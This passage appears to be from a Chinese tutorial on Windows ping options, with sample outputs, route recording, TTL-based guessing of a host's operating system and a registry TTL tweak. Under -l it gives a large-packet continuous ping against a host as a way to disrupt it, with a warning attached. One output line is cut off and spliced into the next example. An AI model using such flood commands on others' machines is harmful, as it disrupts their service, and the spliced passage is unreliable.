Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。
-l size Send buffer size.
定义echo数据包大小。
在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有***性的命令:(以下介绍带有危险性,仅用于试验,请勿轻易施于别人机器上,否则后果自负)
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 timeping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。
-s count Timestamp for count hops.
指定 count 指定的跃点数的时间戳。
此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。
-j host-list Loose source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。
-k host-list Strict source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。
-w timeout Timeout in milliseconds to wait for each reply.
指定超时间隔,单位为毫秒。
此参数没有什么其他技巧。
32)ping命令的其他技巧:
在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
  128---80
  64----40
  32----20